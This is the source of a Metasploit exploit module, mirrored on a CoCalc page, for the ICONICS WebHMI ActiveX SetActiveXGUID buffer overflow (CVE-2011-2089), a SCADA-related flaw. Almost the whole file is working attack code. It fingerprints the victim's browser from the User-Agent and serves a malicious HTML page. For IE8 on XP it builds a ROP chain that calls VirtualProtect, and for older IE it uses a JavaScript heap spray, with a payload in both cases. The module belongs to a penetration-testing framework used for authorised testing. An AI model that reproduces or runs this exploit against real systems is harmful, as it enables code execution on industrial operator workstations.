CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb
Views: 11783
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10


11
  def initialize(info={})

12
    super(update_info(info,

13
      'Name'           => "ICONICS WebHMI ActiveX Buffer Overflow",

14
      'Description'    => %q{

15
          This module exploits a vulnerability found in ICONICS WebHMI's ActiveX control.

16
        By supplying a long string of data to the 'SetActiveXGUID' parameter, GenVersion.dll

17
        fails to do any proper bounds checking before this input is copied onto the stack,

18
        which causes a buffer overflow, and results arbitrary code execution under the context

19
        of the user.

20
      },

21
      'License'        => MSF_LICENSE,

22
      'Author'         =>

23
        [

24
          'Scoot Bell <scott.bell[at]security-assessment.com>',

25
          'Blair Strang <blair.strang[at]security-assessment.com>',

26
          'sinn3r',  #Metasploit port

27
        ],

28
      'References'     =>

29
        [

30
          ['CVE', '2011-2089'],

31
          ['OSVDB', '72135'],

32
          ['URL', 'http://www.security-assessment.com/files/documents/advisory/ICONICS_WebHMI.pdf'],

33
          ['EDB', '17240'],

34
          ['URL', 'https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-11-080-02']

35
        ],

36
      'Payload'        =>

37
        {

38
          'BadChars'         => "\x00",

39
          'StackAdjustment'  => -3500,

40
        },

41
      'DefaultOptions'  =>

42
        {

43
          'EXITFUNC'         => "seh",

44
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',

45
        },

46
      'Platform'       => 'win',

47
      'Targets'        =>

48
        [

49
          [

50
            'Automatic', {}

51
          ],

52
          [

53
            'IE 6/7/8 on Windows XP SP3',

54
            {

55
              'Offset'       => 510,         #Offset to where ROP gadgets begin

56
              'Ret'          => 0x770167b0,  #PUSH ESP; POP EBP; RETN 8

57
              'Max'          => 4500,        #Max buffer size used

58
            },

59
          ],

60
          [

61
            'IE 7 on Windows Vista',

62
            {

63
              'Ret'          => 0x0c0c0c0c,  #Target spray

64
              'blockSize'    => "0x1000",

65
              'spraySize'    => "0x8500",

66
              'Max'          => 4500,

67
            },

68
          ],

69
        ],

70
      'Privileged'     => false,

71
      'DisclosureDate' => '2011-05-05',

72
      'DefaultTarget'  => 0))

73
  end

74


75
  def junk

76
    return rand_text(4).unpack("L")[0].to_i

77
  end

78


79
  def repeat(addr, rep)

80
    arr = []

81
    rep.times { arr << addr }

82
    return arr

83
  end

84


85
  def on_request_uri(cli, request)

86


87
    my_target = ''

88
    agent = request.headers['User-Agent']

89


90
    if agent =~ /NT 5\.1/ and agent =~ /MSIE (6|7)\.\d/

91
      my_target = targets[2]

92
    elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.\d/

93
      my_target = targets[2]

94
    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/

95
      my_target = targets[1]

96
    else

97
      send_not_found(cli)

98
      print_error("Unknown User-Agent")

99
      return

100
    end

101


102
    js = ''

103
    sploit = ''

104


105
    if my_target['spraySize'] == nil

106


107
      #ROP tekniq is only used against IE 8 + XP SP3 (ENG), since the gadgets are specific

108
      #to the service pack (non or fully patched)

109


110
      rop_gadgets = [

111
        my_target.ret,

112
        junk,

113
        0x7e45c67f,              #XCHG EAX,EBP; RETN (USER32.dll)

114
        repeat(junk, 2),

115
        0x7e440639,              #ADD ESP,10; POP EDI; POP ESI; POP EBX; RETN USER32.dll

116
        0x7c801ad4,              #Kernel32.VirtualProtect

117
        junk,                    #Initial ESP + 8 p1 = retaddr

118
        junk,                    #p2 - lpaddr

119
        junk,                    #p3 - size

120
        junk,                    #p4 - perms

121
        junk,                    #p5 - oldperms

122
        junk,

123
        #Return address

124
        0x7e4462ed,              #XCHG EAX,ECX; RETN (USER32.dll)

125
        0x7c902b50,              #MOV EDX, ECX; RETN (ntdll.dll)

126
        repeat(0x77aa2d96, 20),  #INC ECX * 21 (CRYPT32.dll)

127
        0x7c901726,              #MOV EAX, EDX; RETN (ntdll.dll)

128
        repeat(0x5b86a17b, 2),   #ADD EAX,7B; RETN * 2 (NETAPI32.dll)

129
        repeat(0x77c34fbd, 2),   #ADD EAX,5C; RETN * 2 (msvcrt.dll)

130
        0x7E76EA74,              #MOV DWORD PTR DS:[ECX],EAX; RETN (SXS.dll)

131
        #Shellcode pointer

132
        repeat(0x77aa2d96, 4),   #INC ECX * 4 (CRYPT32.dll)

133
        0x7E76EA74,              #MOV DWORD PTR DS:[ECX],EAX; RETN (SXS.dll)

134
        #Size  (0x400 bytes)

135
        repeat(0x77aa2d96, 4),   #INC ECX * 4 (CRYPT32.dll)

136
        0x7e721a99,              #POP EAX; RETN (SXS.dll)

137
        0x3BFFF9CB,              #Value to XOR

138
        0x7e7560b5,              #XOR EAX,3bfffdcb (SXS.dll)

139
        0x7E76EA74,              #MOV DWORD PTR DS:[ECX],EAX; RETN (RPCRT4.dll)

140
        #NewProtect

141
        repeat(0x77aa2d96, 4),   #INC ECX * 4 (CRYPT32.dll)

142
        0x7E456160,              #XOR EAX,EAX; RETN (USER32.dll)

143
        0x7E4193BA,              #ADD AL,3B (USER32.dll)

144
        repeat(0x7E442074, 5),   #INC EAX; RETN (USER32.dll)

145
        0x7E76EA74,              #MOV DWORD PTR DS:[ECX],EAX; RETN (USER32.dll)

146
        #OldProtect

147
        repeat(0x77aa2d96, 4),   #INC ECX * 4 (CRYPT32.dll)

148
        0x7e721a99,              #POP EAX (SXS.dll)

149
        0x10010570,              #EAX (Wriable memory)

150
        0x7E76EA74,              #MOV DWORD PTR DS:[ECX],EAX; RETN (USER32.dll)

151
        #Call VirtualProtect

152
        repeat(0x7E421AAF, 20),  #DEC ECX; RETN (USER32.dll)

153
        0x7E4462ED,              #XCHG EAX,ECX; RETN (USER32.dll)

154
        0x7E45F257,              #XCHG EAX,ESP; RETN (USER32.dll)

155
        repeat(junk, 2),         #Align shellcode

156
        ].flatten.pack('V*')

157


158
        sploit << Rex::Text.to_unescape(rand_text_alpha(my_target['Offset']), Rex::Arch.endian(target.arch))

159
        sploit << Rex::Text.to_unescape(rop_gadgets, Rex::Arch.endian(target.arch))

160
        sploit << Rex::Text.to_unescape(make_nops(80), Rex::Arch.endian(target.arch))

161
        sploit << Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

162
        sploit << rand_text_alpha(my_target['Max']-sploit.length)

163


164
    else

165


166
      #If we don't have to ROP, then we just spray against the rest of the targets

167


168
      shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

169
      target_ret = [my_target.ret].pack('V')

170
      nops = Rex::Text.to_unescape(target_ret*4, Rex::Arch.endian(target.arch))

171
      sploit << Rex::Text.to_unescape(target_ret * (my_target['Max'] / 4), Rex::Arch.endian(target.arch))

172


173
      js_func_name        = rand_text_alpha(rand(6) + 3)

174
      js_var_blocks_name  = rand_text_alpha(rand(6) + 3)

175
      js_var_shell_name   = rand_text_alpha(rand(6) + 3)

176
      js_var_nopsled_name = rand_text_alpha(rand(6) + 3)

177
      js_var_index_name   = rand_text_alpha(rand(6) + 3)

178


179
      js = <<-EOS

180
      <script>

181
      function #{js_func_name}() {

182
        var #{js_var_blocks_name} = new Array();

183
        var #{js_var_shell_name} = unescape("#{shellcode}");

184
        var #{js_var_nopsled_name} = unescape("#{nops}");

185
        while (#{js_var_nopsled_name}.length < #{my_target['blockSize']}) { #{js_var_nopsled_name} += #{js_var_nopsled_name} };

186
        for (var #{js_var_index_name}=0; #{js_var_index_name} < #{my_target['spraySize']}; #{js_var_index_name}++) {

187
          #{js_var_blocks_name}[#{js_var_index_name}] = [ "" + #{js_var_nopsled_name} + #{js_var_shell_name} ].join("");

188
        }

189
      }

190
      #{js_func_name}();

191
      </script>

192
      EOS

193


194
    end

195


196
    obj_id      = rand_text_alpha(rand(6) + 3)

197
    sploit_name = rand_text_alpha(rand(6) + 3)

198


199
    html = <<-EOS

200
    <html>

201
    <head>#{js}</head>

202
    <body>

203
    <object classid="clsid:D25FCAFC-F795-4609-89BB-5F78B4ACAF2C" id="#{obj_id}"></object>

204
    <script>

205
    var #{sploit_name} = unescape("#{sploit}");

206
    #{obj_id}.SetActiveXGUID(#{sploit_name});

207
    </script>

208
    </body>

209
    </html>

210
    EOS

211


212
    html = html.gsub(/^ {4}/, "")

213


214
    print_status("Sending malicious page")

215
    send_response(cli, html, {'Content-Type'=>'text/html'})

216


217
  end

218
end

219


220